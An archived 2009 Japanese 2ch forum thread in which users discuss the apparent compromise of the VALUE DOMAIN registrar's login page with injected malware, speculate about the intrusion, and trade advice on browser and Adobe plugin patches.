VALUE DOMAINってどうよ? part33at HOSTING
VALUE DOMAINってどうよ? part33 - 暇つぶし2ch293:名無しさん@お腹いっぱい。
09/07/07 22:18:18 0
なんか出張行ってる間にずいぶんスレが伸びてると思ったらえらいことになってるんだな。
まあ、俺は常時javascriptはoffにしてるから今回の問題は関係ないけど。

あ、支払いの時だけはjavascript許可しないと動作しなかったのでonにしたけど、かなり前の話しだし。

294:名無しさん@お腹いっぱい。
09/07/07 22:28:36 0
クラッカーがPHPを自由に改ざんできたとすると、
パスや個人情報を引き抜き放題だった可能性があるな。
そうだった場合どうなることやら。

295:名無しさん@お腹いっぱい。
09/07/07 22:32:51 0
話をすりかえるのに必死なのがいるなw

296:名無しさん@お腹いっぱい。
09/07/07 22:35:26 0
>>293
クライアントPCは無事かもしれないけど無関係とはいえないよ

297:名無しさん@お腹いっぱい。
09/07/07 22:40:27 0
つかPHP改竄できたのなら
個人情報ぶっこ抜きとか簡単にできるじゃろ
ろぎんしてないから関係ないよね(キリッ
って何アホなこと言ってんだよ

298:名無しさん@お腹いっぱい。
09/07/07 22:43:52 0
なんかドメイン乗っ取られたっぽい。サイトが変な広告サイトになってる。
whoisしても全く知らん所になってるし。
あとなんかログインできなかったからパスワード再発行したけど梨の礫。

もうだめぽ。

299:名無しさん@お腹いっぱい。
09/07/07 22:47:19 0
>>298
デジロユーザーざまぁwwwwwwwww


300:名無しさん@お腹いっぱい。
09/07/07 22:47:49 0
>>298
いよいよ実害報告ですか
もうちっと詳しく教えていただけませんか?

301:名無しさん@お腹いっぱい。
09/07/07 22:51:06 0
>>289>>104あたりでダメなのか
>>293
よく分からん。>>151ならAdobeReader、FlashPlayer最新バージョン、
javaスクoffならログインしてもいいのか
なんか別のとこで、それではダメだったケースがあったが
念のためブラウザIE以外にしといたほうのがいいのか
それでは、まるっきりGENOといっしょだが
自分では確認できんので、どうしようもない

302:名無しさん@お腹いっぱい。
09/07/07 22:52:05 0
>>298
釣りじゃないならもっと詳しい情報を

303:名無しさん@お腹いっぱい。
09/07/07 22:55:03 0
0-day攻撃だったのは分かるんだが
どうやってlogin.phpに仕込んだのか謎のままだな

304:名無しさん@お腹いっぱい。
09/07/07 22:57:11 0
>>300
さっきサイトを確認しようとしたらサイトが変な広告サイトななってて、
whoisで確認したらIPから所有者情報まで全部書き変わってた。

あとログインしようとしてもできなかったんでパスワード再発行したんだけど、
そのメールも全く届かない。

サポには連絡したけどどうしようも無い状態。

305:名無しさん@お腹いっぱい。
09/07/07 22:59:15 0
気になって一応うちのドメインサイト全チェックしたけど問題なし。

>>304はとりあえずトリップつけてくれ

306:名無しさん@お腹いっぱい。
09/07/07 22:59:56 0
>>304
乗っ取られたっていうドメインさらしてくれないと
釣りかどうか判断できんのだが

307:名無しさん@お腹いっぱい。
09/07/07 23:00:54 0
>>301
>>151とか上のほう少しは読めよ

308:名無しさん@お腹いっぱい。
09/07/07 23:02:10 0
最後にログインしたのはいつ?
該当期間中にvalue-domain.comで何か設定変えた? (クッキー抜かれた?)


309:名無しさん@お腹いっぱい。
09/07/07 23:02:18 0
>>304
やふーやぐーぐるはどうなりますか?
なんらかのウイルスに感染しててちがうとこ見に行ってるとか
あるかもしれない

310:名無しさん@お腹いっぱい。
09/07/07 23:03:27 0
ネタかマジか全然わからんしなあ

311:名無しさん@お腹いっぱい。
09/07/07 23:04:11 0
>>304
以下の情報も教えてほしい:

(1) TLDは何? .com? .net? .jp?

(2) 有効期限はいつまで?

312:名無しさん@お腹いっぱい。
09/07/07 23:06:03 0
ドメインロックしてたかどうかとか。

313:名無しさん@お腹いっぱい。
09/07/07 23:06:35 0
ネタでしょ、登録期限切れだったというオチかな、

314:名無しさん@お腹いっぱい。
09/07/07 23:08:51 0
本当なら大事件だ。ありえん。

315:名無しさん@お腹いっぱい。
09/07/07 23:09:51 0
つーか釣りじゃねーの?
タイミングよすぎるだろ。

316:名無しさん@お腹いっぱい。
09/07/07 23:09:53 0
こんなけ騒いでるのに国から指導とかされないから
アンチが騒いでるだけなんじゃないかと思ってしまうんだが、、

317:名無しさん@お腹いっぱい。
09/07/07 23:10:26 0
> whoisで確認したらIPから所有者情報まで全部書き変わってた。
がネタ臭い

318:名無しさん@お腹いっぱい。
09/07/07 23:10:35 0
悲惨な事になってるな。
仕事でも使ってるのに、洒落にならん…

少し高くても別のところにするしかないかなぁ…

319:名無しさん@お腹いっぱい。
09/07/07 23:12:35 0
>>317
確かに. WHOISにIPは普通出てこない.

320:名無しさん@お腹いっぱい。
09/07/07 23:12:38 0
>>316
ログインフォームを改ざんされたのは事実
個人情報抜かれた可能性があるのも事実

321:名無しさん@お腹いっぱい。
09/07/07 23:12:39 0
だから、ドメイン何よ、
既に登録内容変わっているなら、さらしてもなんら問題無いでしょ。

322:名無しさん@お腹いっぱい。
09/07/07 23:13:17 0
>316
> 国から指導とかされないから

そんなに速攻で動くわけないだろハゲ

323:名無しさん@お腹いっぱい。
09/07/07 23:14:33 0
単一報告では釣り臭さが拭えないね
まあ昨日今日だけでもコンパネログインした人間も相当数いるだろうから今後どうなるか

とりあえず糞デジロ何かアナウンスせいよw

324:名無しさん@お腹いっぱい。
09/07/07 23:14:56 0
実は釣りでした。
食いついたおまいら涙目wwwwwww

325:名無しさん@お腹いっぱい。
09/07/07 23:18:24 0
世界的なニュースになるけで、そんなネタには釣られませんが。
レジストラ/代行がそれやられちゃうと、核爆弾並みの被害ですわ。

326:名無しさん@お腹いっぱい。
09/07/07 23:21:23 0
>>307
ActiveX コントロールを殺しとけばIEでもいいのか
>レジストリにkill bitを立てるか、以下の「Fix it」を押しましょう。
URLリンク(support.microsoft.com)


327:名無しさん@お腹いっぱい。
09/07/07 23:22:08 0
>>324
誰も釣られてないだろ
具体性の無い文章で釣ったつもりか?

328:名無しさん@お腹いっぱい。
09/07/07 23:23:00 0
所詮は後釣り宣言

329:名無しさん@お腹いっぱい。
09/07/07 23:23:33 0
つーか釣りだろ
whoisでIPわかるはずないし
あとさっきから報告の続きないし

330:名無しさん@お腹いっぱい。
09/07/07 23:25:23 0
>>325->>329
まあまあ
デジロ社員じゃない方の例の子っぽいからもっと愛に溢れたレスを沢山つけてあげて下さい・・・
お世話かけさせますけどすいませんね

331:名無しさん@お腹いっぱい。
09/07/07 23:29:40 0
      ,―――ヽ、
   ,/           ~\
  /   ,へ_Vへ__    ~\
/   ノ         ゜ー-、  `ヽ
|    ノ / ̄\   / ̄~ヽ ヽ    i
|   ノ              |  ノ
\  |  <●>  <●>  (  )
 \ |      | |       i /
    |      /  ヽ       レ そろそろ僕の出番ですね
   i     (●_●)      / IPAの誇りをかけて
    i、    ,-―-、   ・ / ValueDomainを
    i、  <(EEEEE)> ∵/
      i、   \___/  _/ まピョーん☆
       \       ,ノ
  ,,.....イ.ヽヽ、ー-―一ノ゙-、.
  :   |  '; \_____ ノ.| ヽ i
      |  \/゙(__)\,|  i |
      >   ヽ. ハ  |   ||


332:名無しさん@お腹いっぱい。
09/07/07 23:32:08 0
デジロックの技術水準っていうか、レベルの判定って難しい気がする。
ネームサーバーだって、ハッキリ言えば、どこでも危険で、bindの話しだし、
login.phpが書き換えられたってのは、本当にどんなセキュリティを突かれたのか、
興味深いな。
確かなのは、zendでコンパイルしていないっぽいのと、何からの
穴があったとのでは?と推測の領域。ディレクトリをdigできる様なアップロードするような
仕組みがあったと思えないんだよな。FTPなんか空いているわけないし、
不審な部分と言えば、決済の外部業者渡しくらい?
しかし、これもクレカの処理を内部で行っていない分、セキュアだしな。

333:名無しさん@お腹いっぱい。
09/07/07 23:37:01 0
> FTPなんか空いているわけないし 云々

なぜ言い切れる?

334:名無しさん@お腹いっぱい。
09/07/07 23:37:59 0
先月のイベントでムームーに逃げて良かった…と思いたいが…
XREA+の更新時期なんだよ~
やべぇ
閉鎖もできん…

335:名無しさん@お腹いっぱい。
09/07/07 23:38:33 0
>>333
俺なら閉じる。
百歩譲って、FTPSでお願いします。

336:名無しさん@お腹いっぱい。
09/07/07 23:43:48 0
まっとうなネットサービス系の会社ならFTP開けたりせんのだけどな

337:名無しさん@お腹いっぱい。
09/07/07 23:46:36 0
まっとうなら、な。
そんなの百も承知で聞く。

なぜ言い切れる?

338:名無しさん@お腹いっぱい。
09/07/07 23:47:06 0
普通に外注のシナチク技術者の仕業かなと思ったんだけど
それだったらlogin.php弄る理由がないんだよね…

339:名無しさん@お腹いっぱい。
09/07/07 23:48:05 0
>>337
> $ ftp www.value-domain.com
> Connected to www.value-domain.com.
> Connection closed by remote host.

340:名無しさん@お腹いっぱい。
09/07/07 23:48:40 0
>>337
統計的な話になるのだが、この種の事故の大部分は
サーバーサイド言語で作られたプログラムの穴が大半です。
ポートの穴やハード的な原因は最後の最後に疑うべきというのが、
今風じゃないのかな?

341:名無しさん@お腹いっぱい。
09/07/07 23:49:59 0
>>339
おいおい、FTPデーモンがおるやんけ 汗

342:名無しさん@お腹いっぱい。
09/07/07 23:50:05 0
login.php、login.phpって言ってるやつ、ちょっと必死すぎない?

343:名無しさん@お腹いっぱい。
09/07/07 23:51:14 0
login.php、login.php

344:名無しさん@お腹いっぱい。
09/07/07 23:54:35 0
SSHじゃなくて、telnetが開いていたに1票

345:名無しさん@お腹いっぱい。
09/07/07 23:54:49 0
そういやユーザーフォーラムには誰も投稿してないよね
必死なのは2ちゃんだけだな

346:名無しさん@お腹いっぱい。
09/07/07 23:56:56 0
>>339
他からうpできる穴がある可能性は?

347:名無しさん@お腹いっぱい。
09/07/07 23:57:41 0
すべてのことが釣りだった場合は、釣られた。

348:名無しさん@お腹いっぱい。
09/07/07 23:57:48 0
ユーザーフォーラムに行くのですら危険だと思ったら、投稿されていなくて当然だろう


349:名無しさん@お腹いっぱい。
09/07/08 00:00:44 0
>>346
イワユル、ウェルノウンポートと言われるポートでは、難しいので、
そうじゃない、ポートとか?
DNSが開いていてもそう簡単には掘れないと思うし、対策済みかと

350:名無しさん@お腹いっぱい。
09/07/08 00:03:59 0
>>345
キーロガーの存在に気がつかなかった可哀想なユーザーが、いつも通りログインし、ユーザーフォーラムを使っているのだよ


351:名無しさん@お腹いっぱい。
09/07/08 00:06:06 0
telnetとかftpあけたままとか・・ど素人なのか?
技術者が抜けて今や素人だけで運営してるとか?

352:名無しさん@お腹いっぱい。
09/07/08 00:08:43 0
知ってる奴はヤバいのでフォーラムに近寄らない

誰も警告を発しないし、当然デジロからのニュースリリースも無い

知らない奴は普通にフォーラムに書き込もうとログイン

マルウェア増殖、仕掛けた奴(゚д゚)ウマー

とこういう自体な訳だな

353:名無しさん@お腹いっぱい。
09/07/08 00:13:17 0
昨日、リアルタイムで改ざんされてたの見たけど、
魚拓とか、それに続く状況報告とか、詳細まで踏み込まれはじめたときに、
ふと気づいたら改ざん部分が戻っていたんだよな

せめて改ざんへの対応をしたのか否かくらいは早く告知ほしいが、
その告知がでたところで、この状況じゃ、告知それ自体が改ざんかもしれない


354:名無しさん@お腹いっぱい。
09/07/08 00:16:32 0
ちょっと質問なんですが、
ユーザーサポートの
URLリンク(sb.xrea.com)
vBulletinが改ざんされたってことでしょうか?
value-domainのloginがやられたかと思ってたよorz

355:名無しさん@お腹いっぱい。
09/07/08 00:20:38 0
>>354
value-domainのloginページが改ざんされていた
現在は修正されているが、告知はない

356:名無しさん@お腹いっぱい。
09/07/08 00:21:38 0
>>355
それなら告知すべきことですね。ヤバイレベルです。
vBulletinはOSSなんでセキュリティホールもあり得るので。

357:名無しさん@お腹いっぱい。
09/07/08 00:22:26 0
value-domain.comのlogin.phpを書き換えられる環境にある奴が
sb.xrea.comのvBulletinのログインに手出してないと考える方が甘いって事だろ

358:名無しさん@お腹いっぱい。
09/07/08 00:32:25 0
login.php自体が書き換えられたかは未だ不明でしょ?

359:名無しさん@お腹いっぱい。
09/07/08 00:32:39 0
真偽確認&アナウンスするはずの対応部署とやらに連絡がいったとされる時間から、もうすぐ24時間

さて、これは告知まで何日かかるかな

360:名無しさん@お腹いっぱい。
09/07/08 00:34:01 0
>>358
それはともかくlogin.phpにリクエストを出して戻ってきたコードに埋め込まれていたのは確か

361:名無しさん@お腹いっぱい。
09/07/08 00:48:06 0
今でもその改竄された時点での魚拓とかある?

362:名無しさん@お腹いっぱい。
09/07/08 00:49:37 0
>>361
>>92がまだ見られるんじゃないかな

363:名無しさん@お腹いっぱい。
09/07/08 00:49:53 0
改竄事件は、他社工作員の捏造。。気にする必要なし。
デジロのセキュリティは万全。

364:名無しさん@お腹いっぱい。
09/07/08 00:50:55 0
>>363
今日は遅出勤務なの?
何時まで?

365:名無しさん@お腹いっぱい。
09/07/08 01:02:01 0
いまだ何もアナウンスがないなんて企業としてどうかしてる。

366:名無しさん@お腹いっぱい。
09/07/08 01:03:21 0
>>354のサポートページ自体はソースに
>>31-32の変数コードなかったけど
ログインしてみないと、その先は分からないからな
フォーラムもトップは大丈夫だけど
ログインしてみないと分からない

>>362  
魚拓はコード残ってるから開かないほうがいい

367:名無しさん@お腹いっぱい。
09/07/08 01:03:30 0
何もなかったから、アナウンスなど無くて当然。
これは、捏造事件です。


368:名無しさん@お腹いっぱい。
09/07/08 01:08:11 0
>>367
隠蔽する気マンマンだなぁ

369:名無しさん@お腹いっぱい。
09/07/08 01:10:04 0
公的ぽいところに届出が無い限り、
がせだと思って良いかな?
URLリンク(www.ipa.go.jp)

370:名無しさん@お腹いっぱい。
09/07/08 01:11:38 0
釣りにマジレスするのもなんだけど
ガセだ捏造だと主張する人は
魚拓もグルだと言うつもりなんだろうか

371:名無しさん@お腹いっぱい。
09/07/08 01:12:48 0
土下座しろとかは言わない もともと、ここはプロかハイアマが使うんだから、
淡々と、しかし正確に事実関係とか告知すれば足ると思うし、かつ必要だと思うんだ

372:名無しさん@お腹いっぱい。
09/07/08 01:16:17 0
>>370
釣りにマジレスすんなよ、と言わせていただこう

373:名無しさん@お腹いっぱい。
09/07/08 01:18:50 0
スラッシュドットジャパンでよければ
URLリンク(slashdot.jp)

374:名無しさん@お腹いっぱい。
09/07/08 01:20:17 0
>>360
それはともかく て。違いが分からないの?

375:名無しさん@お腹いっぱい。
09/07/08 01:33:00 0
徐々にニュースサイト系に情報広がってるね
これがVD流の七夕祭りですか

376:名無しさん@お腹いっぱい。
09/07/08 01:35:33 0
>>369
脆弱性有無の調査方法
DNSキャッシュポイズニングの脆弱性の有無を確認
URLリンク(www.ipa.go.jp)

* porttest.dns-oarc.net -- Check your resolver's source port behavior
* URLリンク(www.dns-oarc.net)

* txidtest.dns-oarc.net -- Check your resolver's transaction ID behavior
* URLリンク(www.dns-oarc.net)

* IANA ― Cross-Pollination Scan
* URLリンク(recursive.iana.org)

この3つで確認すればいいのかな?

377:名無しさん@お腹いっぱい。
09/07/08 01:42:17 0
さっさと仕事しないとGENOウィルスみたいにウィルスの名前になるとかすっげえ不名誉なことになる悪寒

378:名無しさん@お腹いっぱい。
09/07/08 01:43:34 0
コードは確かに書き加えられてたよ。
ここに貼られてたソースもハッキリ見た。

昨夜9時頃ログインしたが今のところ何ともない。
今後どうなるかはわからんが...
明日俺のサイト書き換えられてたりして...orz

379:名無しさん@お腹いっぱい。
09/07/08 01:43:58 0
「VDウイルス」
「デジロウイルス」

悪くないな

380:名無しさん@お腹いっぱい。
09/07/08 01:58:29 0
コードが書き換えられていたのなら、

それを修正対応処理した時点でデジロが何かアナウンスして当然でしょ。
アナウンスが無いのはコード書き換えなど無かったからです。
他社工作員の捏造にだまされないように、

381:名無しさん@お腹いっぱい。
09/07/08 02:00:36 0
>>376は全然ちがったみたい
>>369見る前はこれかと思ったんだけど

でも、ログインは関係ないのか?
もしかして、ServerとClientは
別物と何度言ったら(nyってやつ?

382:名無しさん@お腹いっぱい。
09/07/08 02:06:45 O
>>380

ノシ >>286

383:名無しさん@お腹いっぱい。
09/07/08 02:08:33 0
>>286の読み方がわからない

384:名無しさん@お腹いっぱい。
09/07/08 02:12:13 0
隠蔽しようと頑張ってるとしか思えんわ

385:名無しさん@お腹いっぱい。
09/07/08 02:48:42 0
なんだかすごいことになったみたいだね
よりによって久々にDNSいじるためにおととい昨日今日とログインしたというのに…
firefoxだけど大丈夫なのかしら

386:名無しさん@お腹いっぱい。
09/07/08 02:52:26 0
>>340
まあそういう穴もあるんだがGeno系は違う場合もあるからねえ
今回もアプリよりFTPとかそっちを疑ったほうがいいのかもしれない
Genoのときもそうだったけど被害サイトが特定のCMSや
Webサーバじゃなかったんで最初混乱した

データを抜いたんじゃなくてPHP書き換えちゃってるんだしね
こういう流れも考えられるよってかんじで参考程度だけど
中の人のPCがGeno系に感染→FTPパスとられる→サーバ側改ざん(新型うめこみ)

387:名無しさん@お腹いっぱい。
09/07/08 02:52:41 0
>>385
ログイン処理の部分で書き換えられていたならばアウト
報告が無いのでどこまで書き換えられたかは判らないが。

388:名無しさん@お腹いっぱい。
09/07/08 02:53:34 0
>>385
FirefoxであればAdobe製品を最新にしていれば
クライアント側は大丈夫かもしれない

389:名無しさん@お腹いっぱい。
09/07/08 02:57:00 0
>>387
そうなのか…ありがとう
JSは大丈夫だったとしてもログイン処理のほうが問題だよね
こればっかりはどうしようもないから報告待ちするしかないなぁ…

390:名無しさん@お腹いっぱい。
09/07/08 02:59:20 0
>>388
GENOの件でReaderとFlashPlayerは最新のはずだからそこは大丈夫そう
教えてくれてありがとう

391:名無しさん@お腹いっぱい。
09/07/08 03:13:24 0
去年改ざんされた広告サーバのIPアドレスを逆引きすると、sakura1.digi-rock.com。
今回改竄されたVDのサーバが、sakura2.digi-rock.com。
また、さくらインターネットに置いているサーバだな。

392:名無しさん@お腹いっぱい。
09/07/08 03:33:50 0
>>388
いや、Adobe製品・・・というか全てのリッチコンテンツ用プラグインを削除しないと安心は出来ないだろ。どうせまだ穴があるに決まってる。
HTML/JavaScriptパーサバグは流石にもうIEくらいしか食らわないだろうけど、プラグインは枯れるどころか不安定機能が絶賛増加中なわけで


393:名無しさん@お腹いっぱい。
09/07/08 03:39:37 0
('A`)アアアァァァァァァァァァァァ....
.
三年寝太郎の俺が
久しぶりに土曜日からずっとアレコレやってたらこの騒ぎ。。。

流し読みだけど↓で合ってる?


 login.phpが書き換えられた。
 
 ① 変なJavaScriptが埋め込まれてる。
    → 変なActiveXが実行される。
     → IEの人は要注意。(魚拓も危険)
      → ともかく全員これを当てておけ。 URLリンク(support.microsoft.com)
 
 ② login.phpが書き換えられたって事は…
    → ログイン危険。
    → というか、何もかもやばいだろ\(^o^)/


394:名無しさん@お腹いっぱい。
09/07/08 03:43:12 0
>>392
そんなあなたにFirefox+NoScript(フレーム禁止も設定で追加)

395:名無しさん@お腹いっぱい。
09/07/08 03:47:41 0
>>394
既にOperaの標準機能でプラグイン停止して運用してる
外部拡張に頼らず本体機能だけでプラグインのON/OFFを切り替えられるから、そういう意味ではかなり便利

396:名無しさん@お腹いっぱい。
09/07/08 03:49:43 0
>>394
ドメイン毎に設定できるのが魅力だけど
許可サイトに加えていくなど、ある程度熟練した人向けだと思う
しっかり設定しないと、動画も表示されないからね

397:名無しさん@お腹いっぱい。
09/07/08 03:50:45 0
>>393
変なActiveXだけじゃなく変なPDFと変なSWFもあったみたいだよ
どれかにヒットすれば感染おめでとう

サーバ側についてはGenoと同じでなかったことにしようとしてるみたいだね
価格.comの改悪型Genoメソッドだ

他の攻撃サイトでもIEをターゲットにしているものは多いし
IEをメインブラウザとして使うのは危ないね

398:名無しさん@お腹いっぱい。
09/07/08 03:59:23 0
             /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ消せばいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /


399:動揺激しい、さくらスレに誤爆したw
09/07/08 04:10:16 0
thx、何でGENOの話をしてるのか分かってなかった。
pdf,swfもあったのね。


 login.phpが書き換えられた。
 
 ① 変なJavaScriptが埋め込まれてる。
    → 変なActiveXが実行される。
     → IEの人は要注意。(魚拓も危険)
      → ともかく全員これを当てておけ。 URLリンク(support.microsoft.com)

    → 変な pdf と swf を読まされる。
     → 例のGENO系。既に最新のAdobeReaderとFlashPlayerになってるよな!?
      → Adobe製品は自動更新間隔の期間が長いので、常に自分で最新を当てにいけ。
 
 ② login.phpが書き換えられたって事は…
    → ログイン危険。
    → というか、何もかもやばいだろ\(^o^)/

400:名無しさん@お腹いっぱい。
09/07/08 04:14:03 0
>>396
そうなんだよね
わけわかめな人についてはNoScriptは入れないほうが良いとおもう

ただ、IEが一番狙われてるのは確実だからNoScriptなしでも
Firefox(その他のブラウザ含む)のがマシと考えられる
Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
IE8にもそういう機能がついてるけど踏まないと報告できないようなので
少なくとも一回罠にかからなきゃいけないんだよね・・・
それとも見落としていただけで報告サイトあるんだろうか

どっちみち今回のような未知のドメインには対応してないので基本的な対策は必要だけどね

ただ、Firefoxが良いから使えっていうポジティブな理由じゃなく
IEが危なすぎるからやめろっていうネガティブな理由なんで他ブラウザでも構わない
Google Chromeはたとえブラウザの脆弱性があったとしても
サンドボックス化されていて実行する権限が無いので動かないみたいな話だったかな

401:名無しさん@お腹いっぱい。
09/07/08 04:18:55 0
このあたりに今回の件が書いてある
URLリンク(ilion.blog47.fc2.com)
URLリンク(www.st.ryukoku.ac.jp)
URLリンク(lineage.paix.jp)

402:名無しさん@お腹いっぱい。
09/07/08 04:19:26 0
>>399
ここの人は大丈夫だと思うけど、念のためGeno関連補足
AdobeReaderに関しては今後また狙われそうなJavaScript機能のオフ推奨
また、Reader自体使用していないならアンインストールしたほうが無難
メーカー製PCの場合は勝手に入ってることが多いので使用していなくても
インストールされていないか要確認

403:名無しさん@お腹いっぱい。
09/07/08 04:39:35 0
これってreader入れてなければflashプレイヤー入ってても感染しないの?

404:名無しさん@お腹いっぱい。
09/07/08 04:40:40 0
>>399
これってブラウザのスクリプト切ってても感染するの?

405:名無しさん@お腹いっぱい。
09/07/08 04:42:23 0
>403
だから FlashPlayer は最新にしろとあれほど

406:名無しさん@お腹いっぱい。
09/07/08 05:11:23 0
要するにAdobe私ねってことだ

407:名無しさん@お腹いっぱい。
09/07/08 06:27:28 0
>>405
してるよ。
IE6
flashplayer最新
reader無し

408:名無しさん@お腹いっぱい。
09/07/08 06:52:32 0
URLリンク(support.microsoft.com)
をやってないならアウト

409:名無しさん@お腹いっぱい。
09/07/08 07:12:59 0
>>408
やってないみたいだけど感染してるかどうかってどこで見分けるの?
GENOウイルスはレジストリエディタが立ち上がらなくなるって聞いたけど立ち上がるし
アプリケーションが糞重くなるって聞いたけど特に変化無いし
PeerGurdian2で見てても特に変な動きしてないみたいなんだけど。

410:名無しさん@お腹いっぱい。
09/07/08 07:22:13 0
動画見ないからそもそもフラッシュのプラグイン入れてないなw

411:名無しさん@お腹いっぱい。
09/07/08 08:00:03 0
横になったら寝てた
>>400
>Firefoxに関してはGoogleセーフブラウジングである既知の危険ドメインは
カットできるんでそういう意味でも多少安全
寝る前に、そういうサイト踏んだら、そうなった
今IE7でやってみたら、危険なドメイン開いた
>>408やってなかったからか

412:名無しさん@お腹いっぱい。
09/07/08 08:11:37 0
>>409
バックドアかキーロガーだから見つかりにくいように作ってるだろう。
regeditが起動しないみたいなあからさまな挙動はない。
私は感染してないので、がんばって見分け方を見つけてね。

413:名無しさん@お腹いっぱい。
09/07/08 08:24:11 0
見分け方は、sqlsodbc.chmのファイルサイズの確認でしょう
>>411はただのエロサイトだった
それを今回のアドレスでやればいいのかな

414:名無しさん@お腹いっぱい。
09/07/08 09:15:22 0
うっかり砂箱の中で>>408やったらループった
試すアドレスは >>286のでいいのか
FireFox、Chromeはブロックしてくれたけど
IEが接続できなきないだけで、もう一つ分からない
IE8にしないと駄目か



415:名無しさん@お腹いっぱい。
09/07/08 10:01:07 0
IE8にしてみたけどInternet Explorer ではこのページは表示できません
って出るから、これだとブロックしてくれてるのかどうか分からん
うちのモデムの接続もともと不具合だし

416:名無しさん@お腹いっぱい。
09/07/08 10:05:43 0
なんでここがさくらのサーバ使ってんのかと思ったら、
自前のだと良く落ちるからかな?

417:名無しさん@お腹いっぱい。
09/07/08 10:06:38 0
で、結局何?今回の騒動は釣りじゃないのか?

なんか最近思うんだが、ムームードメインとお名前が必死じゃないか?

おれはムームーでのcomドメイン管理を止めた。

使い勝手の悪いムームードメインから
デザインが悪くても管理の楽なバリュードメインにしたよ。
おれと同じようなユーザーは多数いるだろうね。

今回の件、ムームー社員が工作しているように見えるから不思議。

418:名無しさん@お腹いっぱい。
09/07/08 10:10:07 0
それより、お前らどこに引っ越したんだよ

419:名無しさん@お腹いっぱい。
09/07/08 10:10:41 0
■Slashdot.jp
VALUE DOMAIN のログイン ページ改ざん
URLリンク(slashdot.jp)

■リネージュ資料室
VALUE DOMAINログインページ改竄
URLリンク(lineage.paix.jp)

■セキュリティホールMEMO
バリュードメインでこの欠陥を利用した攻撃が発生
URLリンク(www.st.ryukoku.ac.jp)

420:名無しさん@お腹いっぱい。
09/07/08 10:14:45 0
早く公表してくれ


5000人以上の個人情報を保有しているだろうから法的に裁かれるぞ


今回の件ばかりは隠すことは出来ない


下手すれば・・・

421:名無しさん@お腹いっぱい。
09/07/08 10:16:01 0
ゴクリ...

422:名無しさん@お腹いっぱい。
09/07/08 10:28:29 0
釣られないぞ・・・

423:名無しさん@お腹いっぱい。
09/07/08 10:34:25 0
問題が発生した時点でのウイルス検体を拾った人が大勢いる
あとになればなるほど、返答に窮するようになるかもしれないのに、何をやってるんだ

zxshell晒しsage

424:名無しさん@お腹いっぱい。
09/07/08 10:35:55 0
おっと早漏

△ウイルス検体を拾った人
○ウイルス検体を(騒動を察知してわざわざ)拾いにいった人

425:名無しさん@お腹いっぱい。
09/07/08 10:53:53 0
中国か、GMOに身売りになったらイヤだな

426:名無しさん@お腹いっぱい。
09/07/08 11:06:16 O
デジロウイルスのアナウスまだぁ?

427:名無しさん@お腹いっぱい。
09/07/08 11:35:27 0
対策してて大丈夫な人、ここ見ても平気か試してくれよ
URLリンク(dnf.wikiwiki.jp)

428:名無しさん@お腹いっぱい。
09/07/08 12:01:22 0
URLリンク(so.7walker.net)
上のソースで問題の部分は./er/pr.phpだよね

429:名無しさん@お腹いっぱい。
09/07/08 12:03:55 0
どうしちゃったんだよVALUEDOMAIN…

430:名無しさん@お腹いっぱい。
09/07/08 12:07:38 0
>>428はURL間違ってね?

431:名無しさん@お腹いっぱい。
09/07/08 12:22:32 0
デジロックは公式アナウンスをしない気か?
GIGAZINEとか他のニュースサイトでも取り上げてくれれば、
ニュー速とかにスレが立って、デジロも無視できない状態になるだろうに・・・。

あー、乗り換えるのめんどうだし、デジロックには頑張ってほしいよ。

432:名無しさん@お腹いっぱい。
09/07/08 12:26:31 0
公式アナウンスしないっていうより、できないのかも
何が起こったのか把握できる技術者が外注にもいないんだよ、きっと

433:名無しさん@お腹いっぱい。
09/07/08 12:29:40 0
デジロが無視できない状態にしたいのであれば、
国に動いてもらえばよかろう

434:名無しさん@お腹いっぱい。
09/07/08 12:41:50 0
国に動いてもらいたいなら正式に通報しろよ
誰もやってないんだろ

435:名無しさん@お腹いっぱい。
09/07/08 12:44:57 0
>>430
>URL間違ってね?
って、そういう意味か
>>427のソースはこっち
view-source:URLリンク(dnf.wikiwiki.jp)
>>428で問題だったインラインフレームタグって
./er/pr.phpだろう?
まったく同じのはなかったけど
それで安全ってことでいいのか?
こっちはiframeどころかHTMLも碌に
知らないんだから分かる人よろしく
直踏みの感想は特に問題なかったけど
当方の環境で問題なしとしか言えない

436:名無しさん@お腹いっぱい。
09/07/08 12:47:22 0
>>434
誰もやってないだろうね
ここのユーザーは、基本的に法の知識も低い傾向があるしな

437:名無しさん@お腹いっぱい。
09/07/08 12:51:27 0
>>436
お前とかな

438:名無しさん@お腹いっぱい。
09/07/08 12:54:07 0
お子様が紛れ込んでいるようです。

439:名無しさん@お腹いっぱい。
09/07/08 12:54:28 0
法の知識が低いとなんかまずいのかね?
頭でっかちの知識自慢は嫌われますよ~

440:名無しさん@お腹いっぱい。
09/07/08 12:56:55 P
>>436
ググレカスの人ですか?

441:名無しさん@お腹いっぱい。
09/07/08 13:00:04 0
んで今はどんな状況よ

FTP侵入

サイト改竄

ウイルス埋め込み

だけならいいが、
FTPに入られてDBに接続するプログラムを見て、
DBの顧客情報をもってかれていたら終了だろ

442:名無しさん@お腹いっぱい。
09/07/08 13:03:45 0
関係あるかな?

韓国で大規模サイバー攻撃、大統領府など被害
URLリンク(www.nikkei.co.jp)

443:名無しさん@お腹いっぱい。
09/07/08 13:04:07 0
アナウンスないと、突っ込んだ話は正直わからないよねぇ

444:名無しさん@お腹いっぱい。
09/07/08 13:05:49 0
>>440
>>141で規約に謳ってあると言われて
いなくなっちゃったよ
ソース>>142

445:名無しさん@お腹いっぱい。
09/07/08 13:19:02 0
規約の「責任の限界」の内容って、「無責任」とどう違うのかだれか教えて

446:名無しさん@お腹いっぱい。
09/07/08 13:42:26 0
>>445
責任と取るべく努力はするが、ダメだったら許してね
ってことだが、実態は無責任に近いなw

さすがにサーバー落ちたとかそういうレベルじゃなく、資産が他人に盗まれる
可能性を含んだ問題だからなぁ、fc2かgodaddyにでも移動するか・・・

447:名無しさん@お腹いっぱい。
09/07/08 13:47:29 0
ネームサーバ障害の徹底放置しかり、この状況下で移管は止めんが移管先の話は
該当スレでどうぞ。

デジロ社員といつもの頭おかしい子の「他社工作員乙」ってワードの呼び水になるん
でそういう話は該当スレで頼む。

448:名無しさん@お腹いっぱい。
09/07/08 13:49:52 0
